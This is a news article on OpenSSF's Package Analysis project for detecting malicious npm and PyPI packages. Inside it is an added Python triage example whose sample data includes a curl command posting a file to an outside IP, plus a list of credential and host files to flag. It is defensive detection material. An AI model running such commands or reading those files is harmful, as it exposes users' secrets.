SecurityWeek

Application Security

New OpenSSF Project Hunts for Malicious Packages in Open Source Repositories

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Package Analysis project, OpenSSF says, aims to identify the behavior and capabilities of open source packages – including files they access, commands they support, and IPs they connect to – and track modifications that could reveal suspicious activities.

“This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem,” OpenSSF says.

Under development for a while, the project went through extensive changes and only recently became useful, the Foundation says.

Package Analysis dynamically investigates packages in popular open source repositories and places the results in a BigQuery table. The project has already identified more than 200 malicious PyPI and npm packages, but most of these were dependency confusion and typosquatting attacks.

The identified packages typically contained a simple script designed to run at install time and send home a small amount of information about the host. Packages of this kind could, however, do far more harm to those who installed them.

According to OpenSSF, most of these malicious packages could be the work of security researchers, given that no meaningful data was being exfiltrated and that no attempt was made at disguising the behavior.
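To make the two patterns in the article concrete (near-miss names of popular packages, and install-time scripts that read host details and phone home), here is a small triage routine over dynamic-analysis records. This is an added example, not OpenSSF Package Analysis code; the record layout, the `POPULAR` list and the sample packages are constructed for illustration and are not the project's schema.

```python
"""Triage heuristics over constructed dynamic package-analysis records."""
from difflib import SequenceMatcher
from typing import Dict, List, Optional, Tuple

# Constructed sample records: what a sandbox might log per package.
SAMPLE_RECORDS = [
    {"ecosystem": "npm", "name": "lodahs", "phase": "install",
     "files_read": ["/etc/passwd", "/etc/hostname"],
     "commands": ["node preinstall.js", "curl -d @/tmp/h 198.51.100.7"],
     "ips": ["198.51.100.7"]},
    {"ecosystem": "npm", "name": "lodash", "phase": "install",
     "files_read": [], "commands": [], "ips": []},
]
POPULAR = {"npm": ["lodash", "react", "express"]}  # assumed allow-list
SENSITIVE = ("/etc/passwd", "/etc/hostname", "/.ssh/", "/proc/self/environ")


def typosquat_score(name: str, ecosystem: str,
                    popular=POPULAR) -> Optional[Tuple[str, float]]:
    """Closest popular name and similarity when `name` is a near miss of it."""
    best = None
    for cand in popular.get(ecosystem, []):
        if cand == name:
            return None  # exact match: this is the genuine package
        ratio = SequenceMatcher(None, name, cand).ratio()
        if ratio >= 0.8 and (best is None or ratio > best[1]):
            best = (cand, ratio)
    return best


def install_phase_findings(rec: dict) -> List[str]:
    """Flag install-time beaconing: sensitive reads plus outbound traffic."""
    findings = []
    if rec["phase"] == "install" and rec["ips"]:
        findings.append("network connection during install: " + ", ".join(rec["ips"]))
    hits = [p for p in rec["files_read"] if any(s in p for s in SENSITIVE)]
    if hits:
        findings.append("host-identifying files read: " + ", ".join(hits))
    if rec["ips"] and hits:
        findings.append("likely exfiltration: sensitive reads plus outbound connection")
    return findings


def triage(records=SAMPLE_RECORDS) -> Dict[str, List[str]]:
    """Map each package name to its findings; clean packages are omitted."""
    out = {}
    for rec in records:
        found = install_phase_findings(rec)
        near = typosquat_score(rec["name"], rec["ecosystem"])
        if near:
            found.append(f"possible typosquat of {near[0]} (similarity {near[1]:.2f})")
        if found:
            out[rec["name"]] = found
    return out
```

The similarity threshold and the sensitive-path list are tuning knobs; in practice they would be fed from the sandbox's own output rather than the constructed records above.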
The Foundation calls for involvement in advancing the project, to improve behavioral detection, automate result processing, store packages processed for long-term analysis, and improve reliability.

Google, which has long advocated for a safer open source environment and which is a member of OpenSSF, has already announced support for the project.

“This program contributes to a more secure software supply chain and greater trust in open source software. The program also gives insight into the types of malicious packages that are most common at any given time, which can guide decisions about how to better protect the ecosystem,” Google says.

According to the internet giant, the short time Package Analysis needed to identify malicious packages shows that more should be invested in vetting packages to keep users safe.

“This is a growing space, and having an open standard for reporting would help centralize analysis results and offer consumers a trusted place to assess the packages they’re considering using. Creating an open standard should also foster healthy competition, promote integration, and raise the overall security of open source packages,” Google concluded.
Written By

Ionut Arghire is an international correspondent for SecurityWeek.